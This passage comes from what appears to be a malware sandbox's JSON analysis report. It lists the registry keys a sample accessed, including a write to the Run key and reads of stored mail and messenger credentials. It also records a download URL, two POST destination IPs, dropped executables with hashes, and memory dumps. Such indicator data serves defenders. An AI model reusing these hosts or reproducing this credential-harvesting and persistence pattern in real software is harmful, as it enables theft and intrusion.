[ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "type": "registry_artifact", "version": 1 }, { "operations": [ "write", "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Qualcomm\\Eudora\\CommandLine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla\\Mozilla Thunderbird", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Google\\Google Talk\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Google\\Google Desktop\\Mailboxes", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Account Manager\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Identities", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\Software\\Microsoft\\Internet Account Manager\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\21c3340121c69b4d9839e87233c43775", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5820efc9fdbb5f47849ddf6d61a8efbf", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5822179f3ba9dd4b834ca5b688df58ee", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\5cf6dc56389a514da4af66e8d249d682", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\79245ba6aebb494e8474990b23b0b5d9", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\822186790bcca847a772607001697335", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b76d3b10d1949342bbbb36b682c4ceca", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\IncrediMail\\Identities", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Group Mail", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\MSNMessenger", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\MessengerService", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Yahoo\\Pager", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\IdentityCRL", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Live Mail", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Mozilla", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Mozilla\\Mozilla Firefox\\bin", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Mozilla\\Mozilla Firefox 25.0\\bin", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\seamonkey.exe", "type": "registry_artifact", "version": 1 }, { "operations": [ "read", "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Clients\\Mail\\Microsoft Outlook", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": [], "type": "url_artifact", "url": "kerineal.com", "version": 1 }, { "operations": [ "get" ], "type": "url_artifact", "url": "kerineal.com/simplyelegant/hQoBm/", "version": 1 }, { "operations": [ "post" ], "type": "url_artifact", "url": "65.99.230.27", "version": 1 }, { "operations": [ "post" ], "type": "url_artifact", "url": "185.82.23.28", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/327c94b435802f77d12913956b28c70d00ab2de5", "file_type": "created_file", "id": "file_2", "md5_hash": "1b1e6729790854252dfba6c77f198a4e", "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\temp\\38763.exe", "sha1_hash": "327c94b435802f77d12913956b28c70d00ab2de5", "sha256_hash": "3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98", "size": 86016, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/327c94b435802f77d12913956b28c70d00ab2de5", "file_type": "created_file", "id": "file_3", "md5_hash": "1b1e6729790854252dfba6c77f198a4e", "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom.exe", "sha1_hash": "327c94b435802f77d12913956b28c70d00ab2de5", "sha256_hash": "3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98", "size": 86016, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_4", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\programdata\\9f1b.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_5", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\programdata\\9f1c.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_6", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\programdata\\9f2d.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f", "file_type": "created_file", "id": "file_7", "md5_hash": "36427ecb2a0faf13af3047c51b29f9c5", "norm_filename": "c:\\programdata\\9f1c.tmp", "sha1_hash": "9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f", "sha256_hash": "ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345", "size": 112, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/d926af57565c1448dd81009ed90e324575e9b481", "file_type": "created_file", "id": "file_8", "md5_hash": "fdf031de948302c61dede50cd61fa096", "norm_filename": "c:\\programdata\\9f1b.tmp", "sha1_hash": "d926af57565c1448dd81009ed90e324575e9b481", "sha256_hash": "370497cb330134ed7954bbedd18db1a0b34a85bc821b857624183a8d139b95d5", "size": 84, "type": "extracted_file", "version": 1 } ], "process_dumps": [ { "archive_path": "process_dumps/process_00000002-region_00000500-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000002-region_00000500-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_48", "md5_hash": "cfdbe71aca982fed6c6b656d0caeb17e", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "6c96083463e61815f874555864521d6d0576d060", "sha256_hash": "0db95b5295db4ff3be29aebd285791bbe3822bc3190a267e24c4c5bbdef821c6", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000503-addr_0x0000000000130000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000002-region_00000503-addr_0x0000000000130000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_49", "md5_hash": "8e9b5578ba83ecd884a91396a3fc2465", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2f576add9b13e380ac511be1df562d2008f3ea25", "sha256_hash": "5ed81f1c9cabf8d2d5cd58bd487e96a27547d57342fcc442838b9d4e1fb7367f", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000508-addr_0x000000007ffd4000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000508-addr_0x000000007ffd4000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_50", "md5_hash": "06f914762ba001d581449da83c620d93", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "42b4849e02eea6bdf014aa8035928e42dff093a6", "sha256_hash": "64f63e7b670b93d3efa402c410544376fa5b3f176ef8738397e197d2f6cc20a0", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000509-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000509-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_51", "md5_hash": "02cdb0f3419d7fb6914bc00e234a373a", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "590d609fb8dc3c51ca7eb8238827449beb24b318", "sha256_hash": "edf1956c2f7ff4b0561a6da34a580426b68836d73805f69001b2d6dcdd3a86dd", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000510-addr_0x00000000002b0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000002-region_00000510-addr_0x00000000002b0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_52", "md5_hash": "0c10c48f75776ac71f602e5fc7726955", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1c0cfd2b5f4cdc604e2256f993fc8866e98c5579", "sha256_hash": "046abbae8eb963fa6cde433cd788c9d14a05d16f99f310803f12a667d00b5cb3", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000530-addr_0x00000000001f0000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000002-region_00000530-addr_0x00000000001f0000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_53", "md5_hash": "26776567b67940eb9e3c68896f88d0fc", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "5893076c3ebc60251b07acec8f5d5316cb2f6364", "sha256_hash": "0a941a8fbade2e2033fdb7de7fab1920b2fac13c8ef391cfde235c61a8ea9b61", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000537-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000537-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_54", "md5_hash": "0c7d79707076913fa66e3dd84778a06b", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "f3a80b9ea2dc4f353763e7d8c14069093b766c46", "sha256_hash": "00a54745c85094c4aa876cfdd27ee1b79ff35fa8d5f1a4795711e2f79aad1732", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000538-addr_0x0000000000100000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000538-addr_0x0000000000100000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_55", "md5_hash": "baa095d0f424ded37169dccfabe2a48b", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "13de5554742b8bdbbac3f1dd140af759f9f055a4", "sha256_hash": "556d13cdbbe748d7480e2434b1f1d58ff20c3c4211c0491da0abbd118c4e58cc", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000539-addr_0x00000000001b0000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000002-region_00000539-addr_0x00000000001b0000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_56", "md5_hash": "9c3bb8e87f62ceff6b14809e09e9b296", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "650bfc029bc678d178619ca2f091044ad9b05183", "sha256_hash": "3123e042beea9cc7879a83850290cb33279d76057ab046b0d3a35ca6d4e792c9", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000542-addr_0x0000000001230000-size_0x0000000000040000-perm_rwx.bin", "filename": "process_00000002-region_00000542-addr_0x0000000001230000-size_0x0000000000040000-perm_rwx.bin", "id": "proc_dump_57", "md5_hash": "2354787df3b45fa07c165735d81f7441", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "62df854309f7bcf5d1fbfcd4844a5cc5f53a43f1", "sha256_hash": "fe96b8129ce59f863c1e72b158e6498d7a401240075c756956c89775e2a743ec", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000547-addr_0x0000000001400000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000002-region_00000547-addr_0x0000000001400000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_58", "md5_hash": "c5c1d62c0948b8091e5c09924b210348", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ec797a865bf62b86763f9fecdcd80c998aa38c1d", "sha256_hash": "23e02e2912657d0a8c8ed7364f35e64acb24729e392ddae26751281eb07b7e0e", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000556-addr_0x0000000000240000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000002-region_00000556-addr_0x0000000000240000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_59", "md5_hash": "f15c880643517cdb8b27814ee255e372", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a6d3d5fde0845bef9c9891ca3df60bcef290b571", "sha256_hash": "f526b8fded496a7d99d6d7b8f02af57d0085b916c8a42e7a12f0ce9f15017850", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000560-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000560-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_60", "md5_hash": "42cd4e8095b285a8ddfe9c9ee18be60b", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "183c6929bed716466e601c0ea6b69e081d93ad22", "sha256_hash": "ed0a4bed1a560cb736e700d3662d29424ef6b93ec6d3a91022b97a29927e32f8", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000569-addr_0x0000000001390000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000002-region_00000569-addr_0x0000000001390000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_61", "md5_hash": "05d5145899bb0d09fd327a745d990e71", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "751e7cdfdd958c53f5c599e5bef2a5b03f1f98d9", "sha256_hash": "55ce4e0e010da019352764465766312ed6d786a3eab42d3c61539dcfd52038e3", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000570-addr_0x0000000001710000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000002-region_00000570-addr_0x0000000001710000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_62", "md5_hash": "b228d82652b5debac25c21b47e973083", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "3ca1ec2cb2c20fe5e4a67db514af1701db1e0370", "sha256_hash": "250a7fd4bb97c1fa37cb1685d2b5078a08f760b6f4f0c479533b2634851e6c44", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000573-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000573-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_63", "md5_hash": "526295164d92557fb0d81896620560ae", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "b80da19a916ea16a3c99b18d6ef075cbe7c3b8ee", "sha256_hash": "cdc60196a27913e7ddce8403398620c16cc8e821cc15cf4c25eb268fe4a44665", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000582-addr_0x0000000001d80000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000002-region_00000582-addr_0x0000000001d80000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_64", "md5_hash": "8dd12663ea25e12de1921fa5fbd99b59", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "84aeddf37cc98737d0a085b6e1348ba351265803", "sha256_hash": "72f0c8fae08d280726b4d93935864d8fe44649bad5a4ca168f91babcaab3c837", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000584-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000584-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_65", "md5_hash": "8aead5345215b8180d7d74ecd6fd9640", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "9824779536d565eee30a78952c05d50992758af5", "sha256_hash": "f02e4eec657733101e65602d44f45f1b1a90e909fe1200b12065fffaec3c1c8e", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000591-addr_0x0000000001cc0000-size_0x0000000000040000-perm_rwx.bin", "filename": "process_00000002-region_00000591-addr_0x0000000001cc0000-size_0x0000000000040000-perm_rwx.bin", "id": "proc_dump_66", "md5_hash": "520b731edc6f670ec462b84f1d02d140", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "8b72b3ff04f206203946c372b68e203d51866c54", "sha256_hash": "52ce1f01fe15620679951d26f3d165f64b185b6e80815796da2a3d1b8d9d78bb", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000596-addr_0x0000000001200000-size_0x0000000000010000-perm_.bin", "filename": "process_00000002-region_00000596-addr_0x0000000001200000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_67", "md5_hash": "a6b55bfcadb84fcff009af9c77a8c8bb", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "cc6bc8466809e213999039a9de412c107e2f3393", "sha256_hash": 